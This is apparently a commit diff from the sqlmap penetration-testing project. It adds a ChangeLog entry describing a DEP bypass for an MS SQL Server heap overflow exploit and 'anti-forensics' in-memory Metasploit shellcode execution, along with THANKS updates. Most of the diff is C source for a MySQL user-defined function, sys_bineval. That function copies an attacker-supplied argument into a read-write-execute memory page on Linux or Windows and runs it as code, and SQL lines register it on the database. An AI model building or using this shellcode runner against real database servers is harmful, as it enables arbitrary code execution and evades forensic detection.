sqlmapproject
diff --git a/‎doc/ChangeLog‎
Lines changed: 23 additions & 0 deletions b/‎doc/ChangeLog‎
Lines changed: 23 additions & 0 deletions
diff --git a/‎doc/THANKS‎
Lines changed: 14 additions & 2 deletions b/‎doc/THANKS‎
Lines changed: 14 additions & 2 deletions
diff --git a/‎extra/mysqludfsys/lib_mysqludf_sys/linux/Makefile‎
Lines changed: 1 addition & 1 deletion b/‎extra/mysqludfsys/lib_mysqludf_sys/linux/Makefile‎
Lines changed: 1 addition & 1 deletion
diff --git a/‎extra/mysqludfsys/lib_mysqludf_sys/linux/lib_mysqludf_sys.sql‎
Lines changed: 2 additions & 0 deletions b/‎extra/mysqludfsys/lib_mysqludf_sys/linux/lib_mysqludf_sys.sql‎
Lines changed: 2 additions & 0 deletions
diff --git a/‎extra/mysqludfsys/lib_mysqludf_sys/linux/so/lib_mysqludf_sys.so‎
4 KB b/‎extra/mysqludfsys/lib_mysqludf_sys/linux/so/lib_mysqludf_sys.so‎
4 KB
diff --git a/‎extra/mysqludfsys/lib_mysqludf_sys/linux/src/lib_mysqludf_sys.c‎
Lines changed: 126 additions & 1 deletion b/‎extra/mysqludfsys/lib_mysqludf_sys/linux/src/lib_mysqludf_sys.c‎
Lines changed: 126 additions & 1 deletion
diff --git a/‎extra/mysqludfsys/lib_mysqludf_sys/windows/dll/lib_mysqludf_sys.dll‎
0 Bytes b/‎extra/mysqludfsys/lib_mysqludf_sys/windows/dll/lib_mysqludf_sys.dll‎
0 Bytes
diff --git a/‎extra/mysqludfsys/lib_mysqludf_sys/windows/lib_mysqludf_sys.sql‎
Lines changed: 2 additions & 0 deletions b/‎extra/mysqludfsys/lib_mysqludf_sys/windows/lib_mysqludf_sys.sql‎
Lines changed: 2 additions & 0 deletions
@@ -1,3 +1,26 @@
+sqlmap (0.8-1) stable; urgency=low
+
+  * Major enhancement to the Microsoft SQL Server stored procedure
+    heap-based buffer overflow exploit (--os-bof) to automatically bypass
+    DEP memory protection.
+  * Added support for MySQL and PostgreSQL to execute Metasploit shellcode
+    via UDF 'sys_bineval' (in-memory, anti-forensics technique) as an
+    option instead of uploading the standalone payload stager executable.
+  * Added options for MySQL, PostgreSQL and Microsoft SQL Server to
+    read/add/delete Windows registry keys.
+  * Added options for MySQL and PostgreSQL to inject custom user-defined
+    functions.
+  * Added support for --first and --last so the user now has even more
+    granularity in what to enumerate in the query output.
+  * Minor enhancement to save the session by default in
+    'output/hostname/session' file if -s option is not specified.
+  * Minor improvement to automatically remove sqlmap created temporary
+    files from the DBMS underlying file system.
+  * Minor bugs fixed.
+  * Major code refactoring.
+
+ -- Bernardo Damele A. G. <[email protected]>  DAY, DD MMM 20YY 10:00:00 +0000
+
 sqlmap (0.7-1) stable; urgency=low
 
   * Adapted Metasploit wrapping functions to work with latest 3.3
 
@@ -20,7 +20,7 @@ Cesar Cerrudo <[email protected]>
     sqlmap tree as a contrib library and used to run the stand-alone
     payload stager on the target Windows machine as SYSTEM user if the
     user wants to perform a privilege escalation attack,
-    http://www.argeniss.com/research/Churrasco.zip
+    http://www.argeniss.com/research/TokenKidnapping.pdf
 
 Karl Chen <[email protected]>
     for providing with the multithreading patch for the inference
@@ -50,6 +50,11 @@ Dan Guido <[email protected]>
 Adam Faheem <[email protected]>
     for reporting a few bugs
 
+James Fisher <[email protected]>
+    for providing me with two very good feature requests
+    for his great tool too brute force directories and files names on
+    web/application servers, Dir Buster, http://tinyurl.com/dirbuster
+
 Jim Forster <[email protected]>
     for reporting a bug
 
@@ -70,6 +75,7 @@ Ivan Giacomelli <[email protected]>
     for reviewing the documentation
 
 Oliver Gruskovnjak <[email protected]>
+    for reporting a bug
     for providing me with a minor patch
 
 Davide Guerri <[email protected]>
@@ -108,10 +114,13 @@ Nicolas Krassas <[email protected]>
     for reporting a bug
 
 Guido Landi <[email protected]>
+    for reporting a couple of bugs
     for the great technical discussions
     for Microsoft SQL Server 2000 and Microsoft SQL Server 2005
     'sp_replwritetovarbin' stored procedure heap-based buffer overflow
-    (MS09-004) exploit development, http://www.milw0rm.com/author/1413
+    (MS09-004) exploit development
+    for presenting with me at SOURCE Conference 2009 in Barcelona (Spain)
+    on September 21, 2009
 
 Lee Lawson <[email protected]>
     for reporting a minor bug
@@ -153,6 +162,9 @@ John F. Reiser <[email protected]>
 Antonio Parata <[email protected]>
     for providing me with some ideas for the PHP backdoor
 
+Adrian Pastor <[email protected]>
+    for donating to sqlmap development
+
 Chris Patten <[email protected]>
     for reporting a bug in the blind SQL injection bisection algorithm
 
 
@@ -3,4 +3,4 @@ LIBDIR=/usr/lib
 install:
 	gcc -Wall -I/usr/include/mysql -O1 -shared src/lib_mysqludf_sys.c -o so/lib_mysqludf_sys.so
 	strip -sx so/lib_mysqludf_sys.so
-	cp -f so/lib_mysqludf_sys.so $(LIBDIR)/lib_mysqludf_sys.so
+	sudo cp -f so/lib_mysqludf_sys.so $(LIBDIR)/lib_mysqludf_sys.so
@@ -25,9 +25,11 @@ DROP FUNCTION IF EXISTS sys_get;
 DROP FUNCTION IF EXISTS sys_set;
 DROP FUNCTION IF EXISTS sys_exec;
 DROP FUNCTION IF EXISTS sys_eval;
+DROP FUNCTION IF EXISTS sys_bineval;
 
 CREATE FUNCTION lib_mysqludf_sys_info RETURNS string SONAME 'lib_mysqludf_sys.so';
 CREATE FUNCTION sys_get RETURNS string SONAME 'lib_mysqludf_sys.so';
 CREATE FUNCTION sys_set RETURNS int SONAME 'lib_mysqludf_sys.so';
 CREATE FUNCTION sys_exec RETURNS int SONAME 'lib_mysqludf_sys.so';
 CREATE FUNCTION sys_eval RETURNS string SONAME 'lib_mysqludf_sys.so';
+CREATE FUNCTION sys_bineval RETURNS int SONAME 'lib_mysqludf_sys.so';
@@ -23,6 +23,9 @@
 #define DLLEXP __declspec(dllexport) 
 #else
 #define DLLEXP
+#include <sys/types.h>
+#include <sys/wait.h>
+#include <unistd.h>
 #endif
 
 #ifdef STANDARD
@@ -191,6 +194,33 @@ char* sys_eval(
 ,	char *error
 );
 
+/**
+ * sys_bineval
+ * 
+ * executes bynary opcodes.
+ * Beware that this can be a security hazard.
+ */
+DLLEXP 
+my_bool sys_bineval_init(
+	UDF_INIT *initid
+,	UDF_ARGS *args
+);
+
+DLLEXP 
+void sys_bineval_deinit(
+	UDF_INIT *initid
+);
+
+DLLEXP 
+int sys_bineval(
+	UDF_INIT *initid
+,	UDF_ARGS *args
+);
+
+#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
+DWORD WINAPI exec_payload(LPVOID lpParameter);
+#endif
+
 
 #ifdef	__cplusplus
 }
@@ -216,10 +246,12 @@ my_bool lib_mysqludf_sys_info_init(
 	}
 	return status;
 }
+
 void lib_mysqludf_sys_info_deinit(
 	UDF_INIT *initid
 ){
 }
+
 char* lib_mysqludf_sys_info(
 	UDF_INIT *initid
 ,	UDF_ARGS *args
@@ -250,10 +282,12 @@ my_bool sys_get_init(
 		return 1;
 	}
 }
+
 void sys_get_deinit(
 	UDF_INIT *initid
 ){
 }
+
 char* sys_get(
 	UDF_INIT *initid
 ,	UDF_ARGS *args
@@ -305,13 +339,15 @@ my_bool sys_set_init(
 	}	
 	return 0;
 }
+
 void sys_set_deinit(
 	UDF_INIT *initid
 ){
 	if (initid->ptr!=NULL){
 		free(initid->ptr);
 	}
 }
+
 long long sys_set(
 	UDF_INIT *initid
 ,	UDF_ARGS *args
@@ -352,10 +388,12 @@ my_bool sys_exec_init(
 		return 1;
 	}
 }
+
 void sys_exec_deinit(
 	UDF_INIT *initid
 ){
 }
+
 my_ulonglong sys_exec(
 	UDF_INIT *initid
 ,	UDF_ARGS *args
@@ -382,10 +420,12 @@ my_bool sys_eval_init(
 		return 1;
 	}
 }
+
 void sys_eval_deinit(
 	UDF_INIT *initid
 ){
 }
+
 char* sys_eval(
 	UDF_INIT *initid
 ,	UDF_ARGS *args
@@ -422,5 +462,90 @@ char* sys_eval(
 	return result;
 }
 
+my_bool sys_bineval_init(
+	UDF_INIT *initid
+,	UDF_ARGS *args
+){
+	return 0;
+}
+
+void sys_bineval_deinit(
+	UDF_INIT *initid
+){
+	
+}
+
+int sys_bineval(
+	UDF_INIT *initid
+,	UDF_ARGS *args
+){
+	int32 argv0_size;
+	size_t len;
+
+#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
+	int pID;
+	char *code;
+#else
+	int *addr;
+	size_t page_size;
+	pid_t pID;
+#endif
+
+	argv0_size = strlen(args->args[0]);
+	len = (size_t)argv0_size;
+
+#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
+	// allocate a +rwx memory page
+	code = (char *) VirtualAlloc(NULL, len+1, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+	strncpy(code, args->args[0], len);
+
+	WaitForSingleObject(CreateThread(NULL, 0, exec_payload, code, 0, &pID), INFINITE);
+#else
+	pID = fork();
+	if(pID<0)
+		return 1;
+
+	if(pID==0)
+	{
+		page_size = (size_t)sysconf(_SC_PAGESIZE)-1;	// get page size
+		page_size = (len+page_size) & ~(page_size);		// align to page boundary
+
+		// mmap an rwx memory page
+		addr = mmap(0, page_size, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_SHARED|MAP_ANONYMOUS, 0, 0);
+
+		if (addr == MAP_FAILED)
+			return 1;
+
+		strncpy((char *)addr, args->args[0], len);
+
+		((void (*)(void))addr)();
+	}
+
+	if(pID>0)
+		waitpid(pID, 0, WNOHANG);
+#endif
+
+	return 0;
+}
+
+#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
+DWORD WINAPI exec_payload(LPVOID lpParameter)
+{
+	__try
+	{
+		__asm
+		{
+			mov eax, [lpParameter]
+			call eax
+		}
+	}
+	__except(EXCEPTION_EXECUTE_HANDLER)
+	{
+
+	}
+
+	return 0;
+}
+#endif
 
-#endif /* HAVE_DLOPEN */
+#endif /* HAVE_DLOPEN */
@@ -25,9 +25,11 @@ DROP FUNCTION IF EXISTS sys_get;
 DROP FUNCTION IF EXISTS sys_set;
 DROP FUNCTION IF EXISTS sys_exec;
 DROP FUNCTION IF EXISTS sys_eval;
+DROP FUNCTION IF EXISTS sys_bineval;
 
 CREATE FUNCTION lib_mysqludf_sys_info RETURNS string SONAME 'lib_mysqludf_sys.dll';
 CREATE FUNCTION sys_get RETURNS string SONAME 'lib_mysqludf_sys.dll';
 CREATE FUNCTION sys_set RETURNS int SONAME 'lib_mysqludf_sys.dll';
 CREATE FUNCTION sys_exec RETURNS int SONAME 'lib_mysqludf_sys.dll';
 CREATE FUNCTION sys_eval RETURNS string SONAME 'lib_mysqludf_sys.dll';
+CREATE FUNCTION sys_bineval RETURNS int SONAME 'lib_mysqludf_sys.dll';